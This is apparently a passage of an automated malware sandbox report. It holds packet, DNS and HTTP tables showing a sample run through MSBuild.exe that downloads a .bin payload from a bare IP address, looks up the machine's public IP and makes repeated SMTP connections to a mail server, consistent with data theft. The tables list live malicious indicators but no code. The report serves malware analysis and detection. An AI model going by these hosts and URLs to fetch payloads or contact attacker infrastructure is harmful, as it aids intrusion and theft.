                                                                Jan 24, 2024 09:02:39.396080017 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396090984 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396109104 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396116018 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396120071 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396121979 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396126986 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396130085 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396136999 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396148920 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396152020 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396159887 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396171093 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396173000 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396182060 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396184921 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396194935 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396208048 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396219015 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396224022 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396224022 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396229982 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396240950 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396254063 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396259069 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396265030 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396275997 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396285057 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396286964 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396296978 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396300077 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396310091 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396320105 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396322966 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396332026 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396333933 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396347046 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396353960 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396358967 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396369934 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396374941 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396383047 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396395922 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396400928 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396406889 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396420002 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396424055 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396431923 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396440983 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396442890 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396452904 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396456003 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396473885 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396495104 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396555901 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396567106 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396576881 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396594048 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396604061 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396605015 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396610975 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396624088 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396624088 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396635056 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396652937 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396655083 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396663904 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396667957 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396678925 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396680117 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396691084 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396703959 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396704912 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396711111 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396716118 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396727085 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396739006 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396739006 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396750927 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396754026 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396760941 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396771908 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396771908 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396784067 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396784067 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396795988 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396806955 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396807909 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396816969 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396821976 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396828890 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396842003 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:02:39.396846056 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396869898 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.396879911 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:02:39.830533028 CET49709443192.168.2.8104.237.62.211
                                                                Jan 24, 2024 09:02:39.830568075 CET44349709104.237.62.211192.168.2.8
                                                                Jan 24, 2024 09:02:39.830634117 CET49709443192.168.2.8104.237.62.211
                                                                Jan 24, 2024 09:02:39.839170933 CET49709443192.168.2.8104.237.62.211
                                                                Jan 24, 2024 09:02:39.839184999 CET44349709104.237.62.211192.168.2.8
                                                                Jan 24, 2024 09:02:40.340959072 CET44349709104.237.62.211192.168.2.8
                                                                Jan 24, 2024 09:02:40.341053009 CET49709443192.168.2.8104.237.62.211
                                                                Jan 24, 2024 09:02:40.343456984 CET49709443192.168.2.8104.237.62.211
                                                                Jan 24, 2024 09:02:40.343476057 CET44349709104.237.62.211192.168.2.8
                                                                Jan 24, 2024 09:02:40.343883038 CET44349709104.237.62.211192.168.2.8
                                                                Jan 24, 2024 09:02:40.421967030 CET49709443192.168.2.8104.237.62.211
                                                                Jan 24, 2024 09:02:40.469902992 CET44349709104.237.62.211192.168.2.8
                                                                Jan 24, 2024 09:02:40.665656090 CET44349709104.237.62.211192.168.2.8
                                                                Jan 24, 2024 09:02:40.665730953 CET44349709104.237.62.211192.168.2.8
                                                                Jan 24, 2024 09:02:40.666084051 CET49709443192.168.2.8104.237.62.211
                                                                Jan 24, 2024 09:02:40.669413090 CET49709443192.168.2.8104.237.62.211
                                                                Jan 24, 2024 09:02:41.272687912 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:41.376209021 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:41.376291037 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:41.778280020 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:41.778526068 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:41.882533073 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:41.882740974 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:41.987493992 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:41.989528894 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:42.108341932 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.108464003 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.108504057 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.108549118 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.108591080 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.108655930 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:42.142764091 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:42.246912956 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.253002882 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:42.357495070 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.357932091 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:42.462764025 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.465533972 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:42.609932899 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.691720963 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.695971012 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:42.799221039 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.799575090 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.799902916 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:42.944058895 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.954118013 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:42.954541922 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:43.058346033 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:43.058465958 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:43.059195042 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:43.059195042 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:43.059268951 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:43.059268951 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:43.162655115 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:43.163671017 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:43.210230112 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:43.313704967 CET58749710192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:43.314203978 CET49710587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:43.315341949 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:43.418538094 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:43.418627977 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:43.975681067 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:43.975857019 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:44.079713106 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.079909086 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:44.184500933 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.184878111 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:44.303756952 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.303792000 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.303805113 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.303817987 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.303831100 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.303843975 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:44.303874016 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:44.305880070 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:44.410326958 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.413264990 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:44.517379999 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.519120932 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:44.625838995 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.626211882 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:44.732902050 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.733201981 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:44.836882114 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.837115049 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:44.975397110 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:44.975608110 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:45.079330921 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:45.087014914 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:45.087014914 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:45.087049007 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:45.087071896 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:45.087116957 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:45.087155104 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:45.087198973 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:45.087233067 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:45.087261915 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:45.087290049 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:02:45.190313101 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:45.190337896 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:45.190368891 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:45.190758944 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:45.191349983 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:02:45.232558012 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:03:09.014065981 CET4970480192.168.2.872.21.81.240
                                                                Jan 24, 2024 09:03:09.116992950 CET804970472.21.81.240192.168.2.8
                                                                Jan 24, 2024 09:03:09.117172003 CET4970480192.168.2.872.21.81.240
                                                                Jan 24, 2024 09:04:12.093750000 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:12.197213888 CET58749711192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:12.197663069 CET49711587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:12.198769093 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:12.301790953 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:12.301877022 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:12.742486000 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:12.742635012 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:12.846515894 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:12.846812963 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:12.952048063 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:12.952495098 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.065694094 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.065747976 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.065785885 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.065815926 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.065860033 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.065931082 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.065946102 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.073196888 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.177299976 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.178500891 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.282418966 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.282630920 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.387057066 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.387403011 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.531976938 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.612850904 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.617685080 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.721173048 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.721465111 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.721723080 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.866820097 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.869822979 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.870102882 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.973743916 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.973771095 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:13.974059105 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.974102974 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.974163055 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.974221945 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:13.975385904 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:14.077594995 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:14.079003096 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:14.079181910 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:14.183053970 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:14.185168982 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:14.288762093 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:14.289555073 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:14.289712906 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:14.393306971 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:14.393338919 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:14.393644094 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:14.394695997 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:14.435631990 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:28.343238115 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:28.435950994 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:04:28.447159052 CET58749713192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:28.447609901 CET49713587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:28.447927952 CET49714587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:28.551246881 CET58749714192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:28.551413059 CET49714587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:28.566867113 CET8049708172.96.14.41192.168.2.8
                                                                Jan 24, 2024 09:04:28.567020893 CET4970880192.168.2.8172.96.14.41
                                                                Jan 24, 2024 09:04:28.949542999 CET58749714192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:28.949778080 CET49714587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:29.053508043 CET58749714192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:29.053719044 CET49714587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:29.160430908 CET58749714192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:29.160953045 CET49714587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:29.273588896 CET58749714192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:29.273674011 CET58749714192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:29.273715019 CET58749714192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:29.273724079 CET49714587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:29.273750067 CET58749714192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:29.273791075 CET58749714192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:29.273799896 CET49714587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:29.275734901 CET49714587192.168.2.8192.185.148.49
                                                                Jan 24, 2024 09:04:29.379846096 CET58749714192.185.148.49192.168.2.8
                                                                Jan 24, 2024 09:04:29.420010090 CET49714587192.168.2.8192.185.148.49

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 24, 2024 09:02:39.704502106 CET4992053192.168.2.81.1.1.1
                                                                Jan 24, 2024 09:02:39.823796034 CET53499201.1.1.1192.168.2.8
                                                                Jan 24, 2024 09:02:41.124038935 CET5746253192.168.2.81.1.1.1
                                                                Jan 24, 2024 09:02:41.271666050 CET53574621.1.1.1192.168.2.8

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 24, 2024 09:02:39.704502106 CET192.168.2.81.1.1.10xba24Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                Jan 24, 2024 09:02:41.124038935 CET192.168.2.81.1.1.10xbe61Standard query (0)mail.qualityaf.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 24, 2024 09:02:36.884737968 CET1.1.1.1192.168.2.80x9db9No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 24, 2024 09:02:36.884737968 CET1.1.1.1192.168.2.80x9db9No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                Jan 24, 2024 09:02:39.823796034 CET1.1.1.1192.168.2.80xba24No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                Jan 24, 2024 09:02:39.823796034 CET1.1.1.1192.168.2.80xba24No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                Jan 24, 2024 09:02:39.823796034 CET1.1.1.1192.168.2.80xba24No error (0)api4.ipify.org173.231.16.75A (IP address)IN (0x0001)false
                                                                Jan 24, 2024 09:02:39.823796034 CET1.1.1.1192.168.2.80xba24No error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                                                                Jan 24, 2024 09:02:41.271666050 CET1.1.1.1192.168.2.80xbe61No error (0)mail.qualityaf.com192.185.148.49A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • api.ipify.org
                                                                • 172.96.14.41

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.849708172.96.14.41807348C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 24, 2024 09:02:38.605853081 CET171OUTGET /mfMeuTZ127.bin HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: 172.96.14.41
                                                                Cache-Control: no-cache
                                                                Jan 24, 2024 09:02:38.736567974 CET1286INHTTP/1.1 200 OK
                                                                Content-Type: application/octet-stream
                                                                Last-Modified: Wed, 24 Jan 2024 04:36:58 GMT
                                                                Accept-Ranges: bytes
                                                                ETag: "4fb7b6f77e4eda1:0"
                                                                Server: Microsoft-IIS/8.5
                                                                Date: Wed, 24 Jan 2024 08:02:41 GMT
                                                                Content-Length: 247872
